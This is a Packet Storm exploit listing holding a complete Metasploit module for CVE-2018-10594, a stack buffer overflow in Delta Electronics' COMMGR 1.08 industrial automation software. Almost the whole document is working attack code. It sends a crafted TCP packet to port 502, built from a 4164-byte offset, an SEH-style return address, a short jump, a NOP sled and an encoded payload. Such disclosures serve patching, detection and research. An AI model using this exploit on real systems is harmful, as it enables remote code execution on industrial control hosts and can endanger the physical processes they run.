Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow

2018-10-08T00:00:00
ID PACKETSTORM:149715
Type packetstorm
Reporter t4rkd3vilz
Modified 2018-10-08T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',  
'Description' => %q{  
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial  
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially  
crafted packets. This module has been tested successfully on Delta Electronics Delta  
Industrial Automation COMMGR 1.08 over  
Windows XP SP3,  
Windows 7 SP1, and  
Windows 8.1.  
},  
'Author' =>  
[  
't4rkd3vilz', # PoC  
'hubertwslin' # Metasploit module  
],  
'References' =>  
[  
[ 'EDB', '44965'],  
[ 'CVE', '2018-10594']  
],  
'Payload' =>  
{  
'Space' => 640,  
'DisableNops' => true,  
'BadChars' => "\x00"  
},  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'COMMGR 1.08 / Windows Universal',  
{  
'Ret' => 0x00401e14, # p/p/r COMMGR.exe  
'Offset' => 4164  
}  
],  
],  
'DisclosureDate' => 'Jul 02 2018',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(502)  
])  
end  
  
def exploit  
data = rand_text_alpha(target['Offset'])  
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled  
data << [target.ret].pack("V")  
data << make_nops(40)  
data << payload.encoded  
  
print_status("Trying target #{target.name}, sending #{data.length} bytes...")  
connect  
sock.put(data)  
disconnect  
end  
end  
  
`